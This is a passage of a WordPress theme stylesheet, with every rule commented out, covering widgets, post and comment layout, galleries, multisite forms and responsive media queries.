Serif", serif;*/ /*font-weight: 700;*/ /*margin: 0 0 1.6em;*/ /*letter-spacing: 0.04em;*/ /*text-transform: uppercase;*/ /*}*/ /*.widget_calendar tbody a {*/ /*-webkit-tap-highlight-color: rgba(255, 255, 255, 0.3);*/ /*background-color: #333;*/ /*color: #fff;*/ /*display: block;*/ /*font-weight: 700;*/ /*}*/ /*.widget_calendar tbody a:hover,*/ /*.widget_calendar tbody a:focus {*/ /*background-color: #707070;*/ /*background-color: rgba(51, 51, 51, 0.7);*/ /*color: #fff;*/ /*}*/ /*.widget_archive a,*/ /*.widget_categories a,*/ /*.widget_links a,*/ /*.widget_meta a,*/ /*.widget_nav_menu a,*/ /*.widget_pages a,*/ /*.widget_recent_comments a,*/ /*.widget_recent_entries a {*/ /*border: 0;*/ /*}*/ /*.widget_archive ul,*/ /*.widget_categories ul,*/ /*.widget_links ul,*/ /*.widget_meta ul,*/ /*.widget_nav_menu ul,*/ /*.widget_pages ul,*/ /*.widget_recent_comments ul,*/ /*.widget_recent_entries ul {*/ /*list-style: none;*/ /*margin: 0;*/ /*}*/ /*.widget_archive li,*/ /*.widget_categories li,*/ /*.widget_links li,*/ /*.widget_meta li,*/ /*.widget_nav_menu li,*/ /*.widget_pages li,*/ /*.widget_recent_comments li,*/ /*.widget_recent_entries li {*/ /*border-top: 1px solid #eaeaea;*/ /*border-top: 1px solid rgba(51, 51, 51, 0.1);*/ /*padding: 0.7667em 0;*/ /*}*/ /*.widget_archive li:first-child,*/ /*.widget_categories li:first-child,*/ /*.widget_links li:first-child,*/ /*.widget_meta li:first-child,*/ /*.widget_nav_menu li:first-child,*/ /*.widget_pages li:first-child,*/ /*.widget_recent_comments li:first-child,*/ /*.widget_recent_entries li:first-child {*/ /*border-top: 0;*/ /*padding-top: 0;*/ /*}*/ /*.widget_archive li:last-child,*/ /*.widget_categories li:last-child,*/ /*.widget_links li:last-child,*/ /*.widget_meta li:last-child,*/ /*.widget_nav_menu li:last-child,*/ /*.widget_pages li:last-child,*/ /*.widget_recent_comments li:last-child,*/ /*.widget_recent_entries li:last-child {*/ /*padding-bottom: 0;*/ /*}*/ /*.widget_categories .children,*/ /*.widget_nav_menu .sub-menu,*/ /*.widget_pages .children {*/ /*border-top: 1px solid #eaeaea;*/ /*border-top: 1px solid rgba(51, 51, 51, 0.1);*/ /*margin: 0.7667em 0 0 0.8em;*/ /*padding-top: 0.7667em;*/ /*}*/ /*.widget_recent_entries .post-date {*/ /*display: block;*/ /*}*/ /*.widget_rss ul {*/ /*list-style: none;*/ /*margin: 0;*/ /*}*/ /*.widget_rss li {*/ /*margin-bottom: 1.6em;*/ /*}*/ /*.widget_rss ul:last-child,*/ /*.widget_rss li:last-child {*/ /*margin-bottom: 0;*/ /*}*/ /*.widget_rss .rsswidget {*/ /*border: 0;*/ /*font-weight: 700;*/ /*}*/ /*.widget_rss .rsswidget img {*/ /*margin-top: -4px;*/ /*}*/ /*.widget_rss .rss-date,*/ /*.widget_rss cite {*/ /*font-family: "Noto Sans", sans-serif;*/ /*font-size: 12px;*/ /*font-size: 1.2rem;*/ /*font-style: normal;*/ /*display: block;*/ /*line-height: 2;*/ /*opacity: 0.8;*/ /*}*/ /*.textwidget > :last-child {*/ /*margin-bottom: 0;*/ /*}*/ /*.textwidget a {*/ /*border-bottom: 1px solid #333;*/ /*}*/ /*.textwidget a:hover,*/ /*.textwidget a:focus {*/ /*border-bottom: 0;*/ /*}*/ /*/!***/ /** 12.0 Content*/ /**!/*/ /*.secondary {*/ /*background-color: #fff;*/ /*display: none;*/ /*padding: 0 7.6923%;*/ /*}*/ /*.secondary.toggled-on {*/ /*border-top: 1px solid transparent;*/ /*border-bottom: 1px solid transparent;*/ /*display: block;*/ /*}*/ /*.widget-area {*/ /*margin: 9.09090% auto 0;*/ /*}*/ /*.site-footer {*/ /*background-color: #fff;*/ /*border-top: 1px solid rgba(51, 51, 51, 0.1);*/ /*padding: 3.84615% 7.6923%;*/ /*}*/ /*/!***/ /** 12.1 Posts and pages*/ /**!/*/ /*.hentry {*/ /*background-color: #fff;*/ /*padding-top: 7.6923%;*/ /*position: relative;*/ /*}*/ /*.hentry.has-post-thumbnail {*/ /*padding-top: 0;*/ /*}*/ /*.hentry.sticky:not(.has-post-thumbnail) {*/ /*padding-top: -webkit-calc(7.6923% + 24px);*/ /*padding-top: calc(7.6923% + 24px);*/ /*}*/ /*.hentry + .hentry {*/ /*border-top: 1px solid rgba(51, 51, 51, 0.1);*/ /*}*/ /*.post-thumbnail {*/ /*border: 0;*/ /*display: block;*/ /*margin-bottom: 2.4em;*/ /*}*/ /*.post-thumbnail img {*/ /*display: block;*/ /*margin: 0 auto;*/ /*}*/ /*a.post-thumbnail:hover,*/ /*a.post-thumbnail:focus {*/ /*opacity: 0.85;*/ /*}*/ /*.entry-header {*/ /*padding: 0 7.6923%;*/ /*}*/ /*.entry-title {*/ /*font-size: 26px;*/ /*font-size: 2.6rem;*/ /*line-height: 1.1538;*/ /*margin-bottom: 0.9231em;*/ /*}*/ /*.entry-content,*/ /*.entry-summary {*/ /*padding: 0 7.6923% 7.6923%;*/ /*}*/ /*.entry-content > :last-child,*/ /*.entry-summary > :last-child {*/ /*margin-bottom: 0;*/ /*}*/ /*.entry-content,*/ /*.entry-summary,*/ /*.page-content,*/ /*.comment-content {*/ /*-webkit-hyphens: auto;*/ /*-moz-hyphens: auto;*/ /*-ms-hyphens: auto;*/ /*hyphens: auto;*/ /*word-wrap: break-word;*/ /*}*/ /*.entry-content h1,*/ /*.entry-summary h1,*/ /*.page-content h1,*/ /*.comment-content h1 {*/ /*font-size: 26px;*/ /*font-size: 2.6rem;*/ /*line-height: 1.1538;*/ /*margin-top: 1.8462em;*/ /*margin-bottom: 0.9231em;*/ /*}*/ /*.entry-content h2,*/ /*.entry-summary h2,*/ /*.page-content h2,*/ /*.comment-content h2 {*/ /*font-size: 22px;*/ /*font-size: 2.2rem;*/ /*line-height: 1.3636;*/ /*margin-top: 2.1818em;*/ /*margin-bottom: 1.0909em;*/ /*}*/ /*.entry-content h3,*/ /*.entry-summary h3,*/ /*.page-content h3,*/ /*.comment-content h3 {*/ /*font-size: 18px;*/ /*font-size: 1.8rem;*/ /*line-height: 1.3333;*/ /*margin-top: 2.6667em;*/ /*margin-bottom: 1.3333em;*/ /*}*/ /*.entry-content h4,*/ /*.entry-content h5,*/ /*.entry-content h6,*/ /*.entry-summary h4,*/ /*.entry-summary h5,*/ /*.entry-summary h6,*/ /*.page-content h4,*/ /*.page-content h5,*/ /*.page-content h6,*/ /*.comment-content h4,*/ /*.comment-content h5,*/ /*.comment-content h6 {*/ /*font-size: 15px;*/ /*font-size: 1.5rem;*/ /*line-height: 1.2;*/ /*margin-top: 3.2em;*/ /*margin-bottom: 1.6em;*/ /*}*/ /*.entry-content h5,*/ /*.entry-content h6,*/ /*.entry-summary h5,*/ /*.entry-summary h6,*/ /*.page-content h5,*/ /*.page-content h6,*/ /*.comment-content h5,*/ /*.comment-content h6 {*/ /*letter-spacing: 0.1em;*/ /*text-transform: uppercase;*/ /*}*/ /*.entry-content > h1:first-child,*/ /*.entry-content > h2:first-child,*/ /*.entry-content > h3:first-child,*/ /*.entry-content > h4:first-child,*/ /*.entry-content > h5:first-child,*/ /*.entry-content > h6:first-child,*/ /*.entry-summary > h1:first-child,*/ /*.entry-summary > h2:first-child,*/ /*.entry-summary > h3:first-child,*/ /*.entry-summary > h4:first-child,*/ /*.entry-summary > h5:first-child,*/ /*.entry-summary > h6:first-child,*/ /*.page-content > h1:first-child,*/ /*.page-content > h2:first-child,*/ /*.page-content > h3:first-child,*/ /*.page-content > h4:first-child,*/ /*.page-content > h5:first-child,*/ /*.page-content > h6:first-child,*/ /*.comment-content > h1:first-child,*/ /*.comment-content > h2:first-child,*/ /*.comment-content > h3:first-child,*/ /*.comment-content > h4:first-child,*/ /*.comment-content > h5:first-child,*/ /*.comment-content > h6:first-child {*/ /*margin-top: 0;*/ /*}*/ /*.entry-content a,*/ /*.entry-summary a,*/ /*.page-content a,*/ /*.comment-content a,*/ /*.pingback .comment-body > a {*/ /*border-bottom: 1px solid #333;*/ /*}*/ /*.entry-content a:hover,*/ /*.entry-content a:focus,*/ /*.entry-summary a:hover,*/ /*.entry-summary a:focus,*/ /*.page-content a:hover,*/ /*.page-content a:focus,*/ /*.comment-content a:hover,*/ /*.comment-content a:focus,*/ /*.pingback .comment-body > a:hover,*/ /*.pingback .comment-body > a:focus {*/ /*border-bottom: 0;*/ /*}*/ /*.entry-content a img,*/ /*.entry-summary a img,*/ /*.page-content a img,*/ /*.comment-content a img {*/ /*display: block;*/ /*}*/ /*.entry-content .more-link,*/ /*.entry-summary .more-link:after {*/ /*white-space: nowrap;*/ /*}*/ /*.entry-content .more-link:after,*/ /*.entry-summary .more-link:after {*/ /*content: "\f429";*/ /*font-size: 16px;*/ /*position: relative;*/ /*top: 5px;*/ /*}*/ /*.author-info {*/ /*border-top: 1px solid #eaeaea;*/ /*border-top: 1px solid rgba(51, 51, 51, 0.1);*/ /*margin: 0 7.6923%;*/ /*padding: 7.6923% 0;*/ /*}*/ /*.author-info .avatar {*/ /*float: left;*/ /*height: 36px;*/ /*margin: 0 1.6em 1.6em 0;*/ /*width: 36px;*/ /*}*/ /*.author-heading {*/ /*color: #707070;*/ /*color: rgba(51, 51, 51, 0.7);*/ /*font-family: "Noto Sans", sans-serif;*/ /*font-size: 12px;*/ /*font-size: 1.2rem;*/ /*letter-spacing: 0.04em;*/ /*margin-bottom: 1.5em;*/ /*text-transform: uppercase;*/ /*}*/ /*.author-title {*/ /*clear: none;*/ /*}*/ /*.author-bio {*/ /*font-size: 12px;*/ /*font-size: 1.2rem;*/ /*line-height: 1.5;*/ /*overflow: hidden;*/ /*padding-bottom: 1px;*/ /*}*/ /*.author-description {*/ /*-webkit-hyphens: auto;*/ /*-moz-hyphens: auto;*/ /*-ms-hyphens: auto;*/ /*hyphens: auto;*/ /*word-wrap: break-word;*/ /*}*/ /*.author-description a {*/ /*border-bottom: 1px solid #333;*/ /*}*/ /*.author-description a:hover,*/ /*.author-description a:focus {*/ /*border-bottom: 0;*/ /*}*/ /*.author-description > :last-child {*/ /*margin-bottom: 0;*/ /*}*/ /*.author-link {*/ /*white-space: nowrap;*/ /*}*/ /*.author-link:after {*/ /*content: "\f429";*/ /*position: relative;*/ /*top: 1px;*/ /*}*/ /*.entry-footer {*/ /*background-color: #f7f7f7;*/ /*color: #707070;*/ /*color: rgba(51, 51, 51, 0.7);*/ /*font-family: "Noto Sans", sans-serif;*/ /*font-size: 12px;*/ /*font-size: 1.2rem;*/ /*line-height: 1.5;*/ /*padding: 3.8461% 7.6923%;*/ /*}*/ /*.entry-footer a {*/ /*border-bottom: 1px solid transparent;*/ /*color: #707070;*/ /*color: rgba(51, 51, 51, 0.7);*/ /*}*/ /*.entry-footer a:hover {*/ /*border-bottom: 1px solid #333;*/ /*}*/ /*.entry-footer a:hover,*/ /*.entry-footer a:focus {*/ /*color: #333;*/ /*}*/ /*.sticky-post {*/ /*background-color: #333;*/ /*color: #fff;*/ /*font-weight: 700;*/ /*letter-spacing: 0.04em;*/ /*padding: 0.25em 0.5em;*/ /*position: absolute;*/ /*top: 0;*/ /*text-transform: uppercase;*/ /*}*/ /*.updated:not(.published) {*/ /*display: none;*/ /*}*/ /*.sticky .posted-on {*/ /*display: none;*/ /*}*/ /*.posted-on:before,*/ /*.byline:before,*/ /*.cat-links:before,*/ /*.tags-links:before,*/ /*.comments-link:before,*/ /*.entry-format:before,*/ /*.edit-link:before,*/ /*.full-size-link:before {*/ /*margin-right: 2px;*/ /*position: relative;*/ /*}*/ /*.posted-on,*/ /*.byline,*/ /*.cat-links,*/ /*.tags-links,*/ /*.comments-link,*/ /*.entry-format,*/ /*.full-size-link {*/ /*margin-right: 1em;*/ /*}*/ /*.format-aside .entry-format:before {*/ /*content: "\f101";*/ /*}*/ /*.format-image .entry-format:before {*/ /*content: "\f473";*/ /*}*/ /*.format-gallery .entry-format:before {*/ /*content: "\f103";*/ /*}*/ /*.format-video .entry-format:before {*/ /*content: "\f104";*/ /*}*/ /*.format-status .entry-format:before {*/ /*content: "\f105";*/ /*}*/ /*.format-quote .entry-format:before {*/ /*content: "\f106";*/ /*}*/ /*.format-link .entry-format:before {*/ /*content: "\f107";*/ /*}*/ /*.format-chat .entry-format:before {*/ /*content: "\f108";*/ /*}*/ /*.format-audio .entry-format:before {*/ /*content: "\f109";*/ /*}*/ /*.posted-on:before {*/ /*content: "\f307";*/ /*}*/ /*.byline:before {*/ /*content: "\f304";*/ /*}*/ /*.cat-links:before {*/ /*content: "\f301";*/ /*}*/ /*.tags-links:before {*/ /*content: "\f302";*/ /*}*/ /*.comments-link:before {*/ /*content: "\f300";*/ /*}*/ /*.full-size-link:before {*/ /*content: "\f402";*/ /*}*/ /*.edit-link:before {*/ /*content: "\f411";*/ /*}*/ /*.comments-link,*/ /*.edit-link {*/ /*white-space: nowrap;*/ /*}*/ /*.page-header {*/ /*background-color: #fff;*/ /*border-bottom: 1px solid rgba(51, 51, 51, 0.1);*/ /*padding: 7.6923%;*/ /*}*/ /*.page-title {*/ /*font-family: "Noto Serif", serif;*/ /*font-size: 18px;*/ /*font-size: 1.8rem;*/ /*line-height: 1.3333;*/ /*}*/ /*.taxonomy-description {*/ /*color: #707070;*/ /*color: rgba(51, 51, 51, 0.7);*/ /*padding-top: 0.4em;*/ /*}*/ /*.taxonomy-description a {*/ /*border-bottom: 1px solid #333;*/ /*}*/ /*.taxonomy-description a:hover,*/ /*.taxonomy-description a:focus {*/ /*border-bottom: 0;*/ /*}*/ /*.taxonomy-description > :last-child {*/ /*margin-bottom: 0;*/ /*}*/ /*.page-content {*/ /*background-color: #fff;*/ /*padding: 7.6923%;*/ /*}*/ /*.page-content > :last-child {*/ /*margin-bottom: 0;*/ /*}*/ /*.page-links {*/ /*clear: both;*/ /*font-family: "Noto Sans", sans-serif;*/ /*margin-bottom: 1.3333em;*/ /*}*/ /*.page-links a,*/ /*.page-links > span {*/ /*border: 1px solid #eaeaea;*/ /*border: 1px solid rgba(51, 51, 51, 0.1);*/ /*display: inline-block;*/ /*font-size: 12px;*/ /*font-size: 1.2rem;*/ /*height: 2em;*/ /*line-height: 2;*/ /*margin: 0 0.3333em 0.3333em 0;*/ /*text-align: center;*/ /*width: 2em;*/ /*}*/ /*.page-links a {*/ /*-webkit-tap-highlight-color: rgba(255, 255, 255, 0.3);*/ /*background-color: #333;*/ /*border-color: #333;*/ /*color: #fff;*/ /*}*/ /*.page-links a:hover,*/ /*.page-links a:focus {*/ /*background-color: #707070;*/ /*background-color: rgba(51, 51, 51, 0.7);*/ /*border-color: transparent;*/ /*color: #fff;*/ /*}*/ /*.page-links > .page-links-title {*/ /*border: 0;*/ /*color: #707070;*/ /*color: rgba(51, 51, 51, 0.7);*/ /*height: auto;*/ /*margin: 0;*/ /*padding-right: 0.5em;*/ /*width: auto;*/ /*}*/ /*.entry-attachment {*/ /*margin-bottom: 1.6em;*/ /*}*/ /*.type-attachment .entry-title {*/ /*-webkit-hyphens: auto;*/ /*-moz-hyphens: auto;*/ /*-ms-hyphens: auto;*/ /*hyphens: auto;*/ /*word-wrap: break-word;*/ /*}*/ /*.entry-caption {*/ /*color: #707070;*/ /*color: rgba(51, 51, 51, 0.7);*/ /*font-family: "Noto Sans", sans-serif;*/ /*font-size: 12px;*/ /*font-size: 1.2rem;*/ /*-webkit-hyphens: auto;*/ /*-moz-hyphens: auto;*/ /*-ms-hyphens: auto;*/ /*hyphens: auto;*/ /*line-height: 1.5;*/ /*padding-top: 0.5em;*/ /*word-wrap: break-word;*/ /*}*/ /*.entry-caption > :last-child {*/ /*margin-bottom: 0;*/ /*}*/ /*/!***/ /** 12.2 Post Formats*/ /**!/*/ /*.format-aside .entry-title,*/ /*.format-image .entry-title,*/ /*.format-video .entry-title,*/ /*.format-quote .entry-title,*/ /*.format-gallery .entry-title,*/ /*.format-status .entry-title,*/ /*.format-link .entry-title,*/ /*.format-audio .entry-title,*/ /*.format-chat .entry-title {*/ /*font-size: 18px;*/ /*font-size: 1.8rem;*/ /*line-height: 1.3333;*/ /*margin-bottom: 1.3333em;*/ /*}*/ /*.format-link .entry-title a:after {*/ /*content: "\f442";*/ /*font-size: 24px;*/ /*height: 24px;*/ /*position: relative;*/ /*top: 0;*/ /*width: 24px;*/ /*}*/ /*.blog .format-status .entry-title,*/ /*.archive .format-status .entry-title {*/ /*display: none;*/ /*}*/ /*/!***/ /** 12.3 Comments*/ /**!/*/ /*.comments-area {*/ /*background-color: #fff;*/ /*border-top: 1px solid #eaeaea;*/ /*border-top: 1px solid rgba(51, 51, 51, 0.1);*/ /*padding: 7.6923%;*/ /*}*/ /*.comments-area > :last-child {*/ /*margin-bottom: 0;*/ /*}*/ /*.comment-list + .comment-respond {*/ /*border-top: 1px solid #eaeaea;*/ /*border-top: 1px solid rgba(51, 51, 51, 0.1);*/ /*}*/ /*.comment-list + .comment-respond,*/ /*.comment-navigation + .comment-respond {*/ /*padding-top: 1.6em;*/ /*}*/ /*.comments-title,*/ /*.comment-reply-title {*/ /*font-family: "Noto Serif", serif;*/ /*font-size: 18px;*/ /*font-size: 1.8rem;*/ /*line-height: 1.3333;*/ /*}*/ /*.comments-title {*/ /*margin-bottom: 1.3333em;*/ /*}*/ /*.comment-list {*/ /*list-style: none;*/ /*margin: 0;*/ /*}*/ /*.comment-list article,*/ /*.comment-list .pingback,*/ /*.comment-list .trackback {*/ /*border-top: 1px solid #eaeaea;*/ /*border-top: 1px solid rgba(51, 51, 51, 0.1);*/ /*padding: 1.6em 0;*/ /*}*/ /*.comment-list .children {*/ /*list-style: none;*/ /*margin: 0;*/ /*}*/ /*.comment-list .children > li {*/ /*padding-left: 0.8em;*/ /*}*/ /*.comment-author {*/ /*color: #707070;*/ /*color: rgba(51, 51, 51, 0.7);*/ /*margin-bottom: 0.4em;*/ /*}*/ /*.comment-author a:hover {*/ /*border-bottom: 1px solid #707070;*/ /*border-bottom: 1px solid rgba(51, 51, 51, 0.7);*/ /*}*/ /*.comment-author .avatar {*/ /*float: left;*/ /*height: 24px;*/ /*margin-right: 0.8em;*/ /*width: 24px;*/ /*}*/ /*.bypostauthor > article .fn:after {*/ /*content: "\f304";*/ /*position: relative;*/ /*top: 5px;*/ /*left: 3px;*/ /*}*/ /*.comment-metadata,*/ /*.pingback .edit-link {*/ /*color: #707070;*/ /*color: rgba(51, 51, 51, 0.7);*/ /*font-family: "Noto Sans", sans-serif;*/ /*font-size: 12px;*/ /*font-size: 1.2rem;*/ /*line-height: 1.5;*/ /*}*/ /*.comment-metadata a,*/ /*.pingback .edit-link a {*/ /*color: #707070;*/ /*color: rgba(51, 51, 51, 0.7);*/ /*}*/ /*.comment-metadata a:hover,*/ /*.pingback .edit-link a:hover {*/ /*border-bottom: 1px solid #333;*/ /*}*/ /*.comment-metadata a:hover,*/ /*.comment-metadata a:focus,*/ /*.pingback .edit-link a:hover,*/ /*.pingback .edit-link a:focus {*/ /*color: #333;*/ /*}*/ /*.comment-metadata {*/ /*margin-bottom: 1.6em;*/ /*}*/ /*.comment-metadata .edit-link {*/ /*margin-left: 1em;*/ /*}*/ /*.pingback .edit-link {*/ /*margin-left: 1em;*/ /*}*/ /*.pingback .edit-link:before {*/ /*top: 5px;*/ /*}*/ /*.comment-content ul,*/ /*.comment-content ol {*/ /*margin: 0 0 1.6em 1.3333em;*/ /*}*/ /*.comment-content li > ul,*/ /*.comment-content li > ol {*/ /*margin-bottom: 0;*/ /*}*/ /*.comment-content > :last-child {*/ /*margin-bottom: 0;*/ /*}*/ /*.comment-list .reply {*/ /*font-size: 12px;*/ /*font-size: 1.2rem;*/ /*}*/ /*.comment-list .reply a {*/ /*border: 1px solid #eaeaea;*/ /*border: 1px solid rgba(51, 51, 51, 0.1);*/ /*color: #707070;*/ /*color: rgba(51, 51, 51, 0.7);*/ /*display: inline-block;*/ /*font-family: "Noto Sans", sans-serif;*/ /*font-weight: 700;*/ /*line-height: 1;*/ /*margin-top: 2em;*/ /*padding: 0.4167em 0.8333em;*/ /*text-transform: uppercase;*/ /*}*/ /*.comment-list .reply a:hover,*/ /*.comment-list .reply a:focus {*/ /*border-color: #333;*/ /*color: #333;*/ /*outline: 0;*/ /*}*/ /*.comment-form {*/ /*padding-top: 1.6em;*/ /*}*/ /*.comment-form label {*/ /*color: #707070;*/ /*color: rgba(51, 51, 51, 0.7);*/ /*font-family: "Noto Sans", sans-serif;*/ /*font-size: 12px;*/ /*font-size: 1.2rem;*/ /*font-weight: 700;*/ /*display: block;*/ /*letter-spacing: 0.04em;*/ /*line-height: 1.5;*/ /*text-transform: uppercase;*/ /*}*/ /*.comment-form input[type="text"],*/ /*.comment-form input[type="email"],*/ /*.comment-form input[type="url"],*/ /*.comment-form input[type="submit"] {*/ /*width: 100%;*/ /*}*/ /*.comment-notes,*/ /*.comment-awaiting-moderation,*/ /*.logged-in-as,*/ /*.form-allowed-tags {*/ /*color: #707070;*/ /*color: rgba(51, 51, 51, 0.7);*/ /*font-family: "Noto Sans", sans-serif;*/ /*font-size: 12px;*/ /*font-size: 1.2rem;*/ /*line-height: 1.5;*/ /*margin-bottom: 2em;*/ /*}*/ /*.logged-in-as a:hover {*/ /*border-bottom: 1px solid #333;*/ /*}*/ /*.no-comments {*/ /*border-top: 1px solid #eaeaea;*/ /*border-top: 1px solid rgba(51, 51, 51, 0.1);*/ /*color: #707070;*/ /*color: rgba(51, 51, 51, 0.7);*/ /*font-family: "Noto Sans", sans-serif;*/ /*font-weight: 700;*/ /*padding-top: 1.6em;*/ /*}*/ /*.comment-navigation + .no-comments {*/ /*border-top: 0;*/ /*}*/ /*.form-allowed-tags code {*/ /*font-family: Inconsolata, monospace;*/ /*}*/ /*.form-submit {*/ /*margin-bottom: 0;*/ /*}*/ /*.required {*/ /*color: #c0392b;*/ /*}*/ /*.comment-reply-title small {*/ /*font-size: 100%;*/ /*}*/ /*.comment-reply-title small a {*/ /*border: 0;*/ /*float: right;*/ /*height: 32px;*/ /*overflow: hidden;*/ /*width: 26px;*/ /*}*/ /*.comment-reply-title small a:before {*/ /*content: "\f405";*/ /*font-size: 32px;*/ /*position: relative;*/ /*top: -3px;*/ /*}*/ /*/!***/ /** 13.0 Footer*/ /**!/*/ /*.site-info {*/ /*color: #707070;*/ /*color: rgba(51, 51, 51, 0.7);*/ /*font-size: 12px;*/ /*font-size: 1.2rem;*/ /*line-height: 1.5;*/ /*}*/ /*.site-info a {*/ /*border-bottom: 1px solid transparent;*/ /*color: #707070;*/ /*color: rgba(51, 51, 51, 0.7);*/ /*}*/ /*.site-info a:hover {*/ /*border-bottom: 1px solid #333;*/ /*}*/ /*.site-info a:hover,*/ /*.site-info a:focus {*/ /*color: #333;*/ /*}*/ /*/!***/ /** 14.0 Media*/ /**!/*/ /*.site .avatar {*/ /*border-radius: 50%;*/ /*}*/ /*.page-content img.wp-smiley,*/ /*.entry-content img.wp-smiley,*/ /*.comment-content img.wp-smiley {*/ /*border: none;*/ /*margin-top: 0;*/ /*margin-bottom: 0;*/ /*padding: 0;*/ /*}*/ /*audio,*/ /*canvas {*/ /*display: inline-block;*/ /*}*/ /*embed,*/ /*iframe,*/ /*object,*/ /*video {*/ /*margin-bottom: 1.6em;*/ /*max-width: 100%;*/ /*vertical-align: middle;*/ /*}*/ /*p > embed,*/ /*p > iframe,*/ /*p > object,*/ /*p > video {*/ /*margin-bottom: 0;*/ /*}*/ /*.wp-audio-shortcode,*/ /*.wp-video,*/ /*.wp-playlist.wp-audio-playlist {*/ /*font-size: 15px;*/ /*font-size: 1.5rem;*/ /*margin-top: 0;*/ /*margin-bottom: 1.6em;*/ /*}*/ /*.wp-playlist.wp-playlist {*/ /*padding-bottom: 0;*/ /*}*/ /*.wp-playlist .wp-playlist-tracks {*/ /*margin-top: 0;*/ /*}*/ /*.wp-playlist-item .wp-playlist-caption {*/ /*border-bottom: 0;*/ /*padding: 10px 0;*/ /*}*/ /*.wp-playlist-item .wp-playlist-item-length {*/ /*top: 10px;*/ /*}*/ /*/!***/ /** 14.1 Captions*/ /**!/*/ /*.wp-caption {*/ /*margin-bottom: 1.6em;*/ /*max-width: 100%;*/ /*}*/ /*.wp-caption img[class*="wp-image-"] {*/ /*display: block;*/ /*margin: 0;*/ /*}*/ /*.wp-caption-text {*/ /*color: #707070;*/ /*color: rgba(51, 51, 51, 0.7);*/ /*font-family: "Noto Sans", sans-serif;*/ /*font-size: 12px;*/ /*font-size: 1.2rem;*/ /*line-height: 1.5;*/ /*padding: 0.5em 0;*/ /*}*/ /*/!***/ /** 14.2 Galleries*/ /**!/*/ /*.gallery {*/ /*margin-bottom: 1.6em;*/ /*}*/ /*.gallery-item {*/ /*display: inline-block;*/ /*padding: 1.79104477%;*/ /*text-align: center;*/ /*vertical-align: top;*/ /*width: 100%;*/ /*}*/ /*.gallery-columns-2 .gallery-item {*/ /*max-width: 50%;*/ /*}*/ /*.gallery-columns-3 .gallery-item {*/ /*max-width: 33.33%;*/ /*}*/ /*.gallery-columns-4 .gallery-item {*/ /*max-width: 25%;*/ /*}*/ /*.gallery-columns-5 .gallery-item {*/ /*max-width: 20%;*/ /*}*/ /*.gallery-columns-6 .gallery-item {*/ /*max-width: 16.66%;*/ /*}*/ /*.gallery-columns-7 .gallery-item {*/ /*max-width: 14.28%;*/ /*}*/ /*.gallery-columns-8 .gallery-item {*/ /*max-width: 12.5%;*/ /*}*/ /*.gallery-columns-9 .gallery-item {*/ /*max-width: 11.11%;*/ /*}*/ /*.gallery-icon img {*/ /*margin: 0 auto;*/ /*}*/ /*.gallery-caption {*/ /*color: #707070;*/ /*color: rgba(51, 51, 51, 0.7);*/ /*display: block;*/ /*font-family: "Noto Sans", sans-serif;*/ /*font-size: 12px;*/ /*font-size: 1.2rem;*/ /*line-height: 1.5;*/ /*padding: 0.5em 0;*/ /*}*/ /*.gallery-columns-6 .gallery-caption,*/ /*.gallery-columns-7 .gallery-caption,*/ /*.gallery-columns-8 .gallery-caption,*/ /*.gallery-columns-9 .gallery-caption {*/ /*display: none;*/ /*}*/ /*/!***/ /** 15.0 Multisite*/ /**!/*/ /*.widecolumn {*/ /*background-color: #fff;*/ /*padding: 7.6923%;*/ /*}*/ /*.widecolumn .mu_register {*/ /*width: auto;*/ /*}*/ /*.widecolumn .mu_alert {*/ /*margin-bottom: 1.6em;*/ /*}*/ /*.widecolumn form,*/ /*.widecolumn .mu_register form {*/ /*margin-top: 0;*/ /*}*/ /*.widecolumn h2 {*/ /*font-size: 26px;*/ /*font-size: 2.6rem;*/ /*line-height: 1.1538;*/ /*margin-bottom: 0.9231em;*/ /*}*/ /*.widecolumn p {*/ /*margin: 1.6em 0;*/ /*}*/ /*.widecolumn p + h2 {*/ /*margin-top: 1.8462em;*/ /*}*/ /*.widecolumn label,*/ /*.widecolumn .mu_register label {*/ /*color: #707070;*/ /*color: rgba(51, 51, 51, 0.7);*/ /*font-family: "Noto Sans", sans-serif;*/ /*font-size: 12px;*/ /*font-size: 1.2rem;*/ /*font-weight: 700;*/ /*letter-spacing: 0.04em;*/ /*line-height: 1.5;*/ /*text-transform: uppercase;*/ /*}*/ /*.widecolumn .mu_register label {*/ /*margin: 2em 0 0;*/ /*}*/ /*.widecolumn #key,*/ /*.widecolumn .mu_register #blog_title,*/ /*.widecolumn .mu_register #user_email,*/ /*.widecolumn .mu_register #blogname,*/ /*.widecolumn .mu_register #user_name {*/ /*font-size: 16px;*/ /*font-size: 1.6rem;*/ /*width: 100%;*/ /*}*/ /*.widecolumn .mu_register #blogname {*/ /*margin: 0;*/ /*}*/ /*.widecolumn .mu_register #blog_title,*/ /*.widecolumn .mu_register #user_email,*/ /*.widecolumn .mu_register #user_name {*/ /*margin: 0 0 0.375em;*/ /*}*/ /*.widecolumn #submit,*/ /*.widecolumn .mu_register input[type="submit"] {*/ /*font-size: 12px;*/ /*font-size: 1.2rem;*/ /*margin: 0;*/ /*width: 100%;*/ /*}*/ /*.widecolumn .mu_register .prefix_address,*/ /*.widecolumn .mu_register .suffix_address {*/ /*font-size: inherit;*/ /*}*/ /*.widecolumn .mu_register > :last-child,*/ /*.widecolumn form > :last-child {*/ /*margin-bottom: 0;*/ /*}*/ /*/!***/ /** 16.0 Media Queries*/ /**!/*/ /*/!**/ /** Does the same thing as <meta name="viewport" content="width=device-width">,*/ /** but in the future W3C standard way. -ms- prefix is required for IE10+ to*/ /** render responsive styling in Windows 8 "snapped" views; IE10+ does not honor*/ /** the meta tag. See https://core.trac.wordpress.org/ticket/25888.*/ /**!/*/ /*@-ms-viewport {*/ /*width: device-width;*/ /*}*/ /*@viewport {*/ /*width: device-width;*/ /*}*/ /*/!***/ /** 16.1 Mobile Large 620px*/ /**!/*/ /*@media screen and (min-width: 38.75em) {*/ /*ul,*/ /*ol {*/ /*margin-left: 0;*/ /*}*/ /*li > ul,*/ /*li > ol,*/ /*blockquote > ul,*/ /*blockquote > ol {*/ /*margin-left: 1.3333em;*/ /*}*/ /*blockquote {*/ /*margin-left: -1em;*/ /*}*/ /*blockquote > blockquote {*/ /*margin-left: 0;*/ /*}*/ /*.site-branding {*/ /*min-height: 3.2em;*/ /*}*/ /*.site-title {*/ /*font-size: 22px;*/ /*font-size: 2.2rem;*/ /*line-height: 1.0909;*/ /*}*/ /*.site-description {*/ /*display: block;*/ /*}*/ /*.secondary {*/ /*box-shadow: 0 0 1px rgba(0, 0, 0, 0.15);*/ /*margin: 7.6923% 7.6923% 0;*/ /*padding: 7.6923% 7.6923% 0;*/ /*}*/ /*.main-navigation {*/ /*margin-bottom: 11.1111%;*/ /*}*/ 